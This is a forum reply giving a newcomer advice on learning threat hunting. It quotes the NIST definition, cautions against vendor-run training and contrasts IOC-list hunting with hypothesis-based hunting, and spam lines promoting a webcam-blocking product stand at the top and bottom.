New to Threat Hunting


Did you know that camDown ?

It is great that everyone here is dropping links to resources and everything but I don't think any of this does any good unless you know how to use what you are given. Right now OP walked onto a construction site and asked how to inspect a foundation. It is good that everyone passes up their tools, but unless OP understands the fundamentals and details behind it, those tools won't do them any good. The other thing is this vendor heavy "training" that keeps getting passed around. I like Active Countermeasures, I like Black Hills Information Security, I like CrowdStrike, I like SQRRL (bought by Amazon)... but every single one of them are going to spin the story of what they want to define threat hunting as so you are sucked into their tools/platforms as a means to generate revenue. Never hang your learning on a company that provides "free training" for a service/tool they offer.

Threat Hunting (as defined by NIST) is the proactive searching of organizational systems, networks, and infrastructure for advanced threats. The objective is to track and disrupt cyber adversaries as early as possible in the attack sequence and to measurably improve the speed and accuracy of organizational responses.

No where in this definition are there restrictions. No where in here do they talk about the pyramid of pain or anything else. The point is that hunting isn't straight forward - it has a maturity curve. Immature hunters will use IOC lists to "hunt" which a lot of people will argue is or isn't hunting. More advanced and mature teams use hypothesis based hunting methods - meaning they come up with thoughts/questions/guesses and go look to prove it right or wrong.

This is my opinion here, but I do not believe that you can "learn" threat hunting by watching some videos or by sitting in some training. Sure you might be able to replicate the activities; but, the results will be wild and all over the place. Hunting comes from experience and being able to think outside of the box. Being able to research their questions, exhausting every trail before asking others. I don't mean for this to seem like I am throwing shade (definitely not, we need more people interested) but I would strongly suggest looking through prior posts here and other subreddits, and absorb the knowledge everyone puts down. For example - someone posted a similar question last week and here is my response then -

Grow. Learn. Conquer the world.

When all is said and done, let me just add that camDown is a highly advanced, specialized webcam blocker and disabler with the best in class protection from variety of on-line threats!